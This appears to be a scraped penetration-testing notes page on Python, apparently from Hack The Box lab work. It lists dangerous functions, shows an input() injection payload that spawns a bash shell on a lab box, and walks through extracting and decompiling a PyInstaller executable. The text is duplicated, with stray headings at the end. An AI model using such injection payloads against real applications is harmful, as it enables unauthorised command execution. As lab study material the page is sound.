Python

Dangerous Functions

commands.getoutput, commands.getstatus, commands.getstatusouput, compile, cPickle.load
cPickle.loads, eval, exec, execfile, input, marshal.load, marshal.loads, os.execl, 
os.execle, os.execlp, os.execlpe, os.execv, os.execve, os.execvp, os.execvpe, os.popen
os.popen2, os.popen3, os.popen4, os.spawnl, os.spawnle, os.spawnlp, os.spawnlpe
os.spawnv, os.spawnve, os.spawnvp, os.spawnvpe, os.startfile, os.system, pickle.load
pickle.loads, popen2.popen2, popen2.popen3, popen2.popen4, shelve.open, subprocess.call
subprocess.check_call, subprocess.check_output, subprocess.Popen, yaml.load

Break out, `input()` example

$ cat siteisup_test.py
import requests

url = input("Enter URL here:")
page = requests.get(url)
if page.status_code == 200:
	print "Website is up"
else:
	print "Website is down"

$ ./siteisup
Welcome to 'siteisup.htb' application

Enter URL here:__import__('os').system('/bin/bash')
developer@updown:/home/developer/dev$ id
uid=1002(developer) gid=33(www-data) groups=33(www-data)

PyInstaller / PyInstxtractor

“PyInstaller reads a Python script written by you. It analyzes your code to discover every other module and library your script needs in order to execute. Then it collects copies of all those files – including the active Python interpreter! – and puts them with your script in a single folder, or optionally in a single executable file.”

PS C:\tools\pyinstxtractor> python3.7.exe pyinstxtractor.py C:\Users\pwn10\Documents\htb\vessel\passwordGenerator       [+] Processing C:\Users\pwn10\Documents\htb\vessel\passwordGenerator
[+] Pyinstaller version: 2.1+
[+] Python version: 3.7
[+] Length of package: 34300131 bytes
[+] Found 95 files in CArchive
[+] Beginning extraction...please standby
[+] Possible entry point: pyiboot01_bootstrap.pyc
[+] Possible entry point: pyi_rth_subprocess.pyc
[+] Possible entry point: pyi_rth_pkgutil.pyc
[+] Possible entry point: pyi_rth_inspect.pyc
[+] Possible entry point: pyi_rth_pyside2.pyc
[+] Possible entry point: passwordGenerator.pyc
[+] Found 142 files in PYZ archive
[+] Successfully extracted pyinstaller archive: C:\Users\pwn10\Documents\htb\vessel\passwordGenerator

You can now use a python decompiler on the pyc files within the extracted directory

Decompile:

PS C:\> pip3 install uncompyle6
PS C:\tools\pyinstxtractor\passwordGenerator_extracted> uncompyle6 passwordGenerator.pyc > passwordGenerator.py
PS C:\tools\pyinstxtractor\passwordGenerator_extracted> cat passwordGenerator.py

Last updated 11 months ago

Was this helpful?

Dangerous Functions

commands.getoutput, commands.getstatus, commands.getstatusouput, compile, cPickle.load
cPickle.loads, eval, exec, execfile, input, marshal.load, marshal.loads, os.execl, 
os.execle, os.execlp, os.execlpe, os.execv, os.execve, os.execvp, os.execvpe, os.popen
os.popen2, os.popen3, os.popen4, os.spawnl, os.spawnle, os.spawnlp, os.spawnlpe
os.spawnv, os.spawnve, os.spawnvp, os.spawnvpe, os.startfile, os.system, pickle.load
pickle.loads, popen2.popen2, popen2.popen3, popen2.popen4, shelve.open, subprocess.call
subprocess.check_call, subprocess.check_output, subprocess.Popen, yaml.load

Break out, input() example

$ cat siteisup_test.py
import requests

url = input("Enter URL here:")
page = requests.get(url)
if page.status_code == 200:
	print "Website is up"
else:
	print "Website is down"

$ ./siteisup
Welcome to 'siteisup.htb' application

Enter URL here:__import__('os').system('/bin/bash')
developer@updown:/home/developer/dev$ id
uid=1002(developer) gid=33(www-data) groups=33(www-data)

PyInstaller / PyInstxtractor

“PyInstaller reads a Python script written by you. It analyzes your code to discover every other module and library your script needs in order to execute. Then it collects copies of all those files – including the active Python interpreter! – and puts them with your script in a single folder, or optionally in a single executable file.”

Single executable files created with PyInstaller can be extracted using . Make sure to have run the script with correct python version!

PS C:\tools\pyinstxtractor> python3.7.exe pyinstxtractor.py C:\Users\pwn10\Documents\htb\vessel\passwordGenerator       [+] Processing C:\Users\pwn10\Documents\htb\vessel\passwordGenerator
[+] Pyinstaller version: 2.1+
[+] Python version: 3.7
[+] Length of package: 34300131 bytes
[+] Found 95 files in CArchive
[+] Beginning extraction...please standby
[+] Possible entry point: pyiboot01_bootstrap.pyc
[+] Possible entry point: pyi_rth_subprocess.pyc
[+] Possible entry point: pyi_rth_pkgutil.pyc
[+] Possible entry point: pyi_rth_inspect.pyc
[+] Possible entry point: pyi_rth_pyside2.pyc
[+] Possible entry point: passwordGenerator.pyc
[+] Found 142 files in PYZ archive
[+] Successfully extracted pyinstaller archive: C:\Users\pwn10\Documents\htb\vessel\passwordGenerator

You can now use a python decompiler on the pyc files within the extracted directory

Decompile:

PS C:\> pip3 install uncompyle6
PS C:\tools\pyinstxtractor\passwordGenerator_extracted> uncompyle6 passwordGenerator.pyc > passwordGenerator.py
PS C:\tools\pyinstxtractor\passwordGenerator_extracted> cat passwordGenerator.py

Dangerous Functions

Break out, input() example

PyInstaller / PyInstxtractor

Dangerous Functions

Break out, input() example

PyInstaller / PyInstxtractor

Break out, `input()` example

Break out, `input()` example